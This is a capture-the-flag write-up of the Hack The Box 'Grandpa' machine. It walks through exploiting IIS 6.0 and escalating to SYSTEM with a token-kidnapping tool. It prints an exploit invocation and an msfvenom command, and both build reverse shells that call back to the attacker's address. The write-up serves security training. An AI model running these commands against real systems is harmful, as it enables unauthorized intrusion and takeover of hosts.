HTB: Grandpa Writeup w/o Metasploit
Grandpa was a good box to practice exploiting IIS web services. It is a pretty common service in production environments. I doubt the version we are using here is being used, but you nowadays you never know.
I created a walkthrough of this box. I did not touch the box or do any research on it prior to the walkthrough video. So, if you want to see how we went through it from a blind perspective, check out this walkthrough here.
Recon
The first thing we did to kick things off was run our nmap scan. Nmap returned one service running on port 80. It was IIS 6.0. Since there was a web service being used, we started up gobuster before checking out the webpage.
Gobuster did return some hits, but they were all dead ends. At least for me they were dead ends.
Enumeration
There was not much to work with at this moment besides the nmap scans. IIS 6.0 is a vulnerable service, we learned about this in previous box named Grandma. I already had an exploit for this vulnerability but I still did my due diligence and checked Searchsploit and Google for IIS 6.0 exploits.
We ended up using this exploit above from github. Here is the link to the repo. If you need instructions to run it, just start the python script and it will return its usage. You can also see the instructions in the image below on the second line of strings.
The screenshot above are the commands we used to get a shell. The top windowpane is where we ran the python script (python iis6/exploit.py 10.10.10.14 80 10.10.14.13 1234). Keep in mind, we are using python2 in the top window. The bottom left pane is our netcat listener accepting the incoming connection from our reverse shell above. The bottom right pane is what we used to setup a smbserver to transfer privilege escalation files for this grandpa box. We will talk more about that below.
Privilege Escalation
Now that we have access to execute some remote commands, the first thing I did was check my privileges. Maybe this account we are using has special permissions. And it does.
With this information we used a token kidnapping tool to escalate our privileges to system. The token kidnapping tool came from this repo . It is pretty easy to use. You can use it to execute commands or files with elevated privileges. What I did was use it to execute a reverse shell as system.
To do this, I started up that smbserver I mentioned earlier. I started that up and transferred the reverse shell (created with msfvenom) and then transferred the churrasco.exe file (token kidnapper tool).
I used “msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.13 lport=443 -f exe -o shell.exe” to create our payload.
In the screenshot above, the left window is us copying over the files from the smbserver we started using the smbserver.py script on kali. The right window starts up the smbserver using python3.
Once the files are copied, I started up a netcat listener on port 443, executed the shell with churrasco.exe (on the left window in the image above) and waited for the shell to connect back to the netcat listener. And boom! We have system level access now.
AAR
This was a good box to practice exploiting IIS 6.0. To prevent an attack like this, the obvious thing to do would be to update IIS to a more secure version. We may also want to secure the service accounts to prevent the token kidnapping attack. If you enjoyed this writeup, please do me a favor and let me know in the comments. Here is a link to the video walkthrough. Thanks for reading!
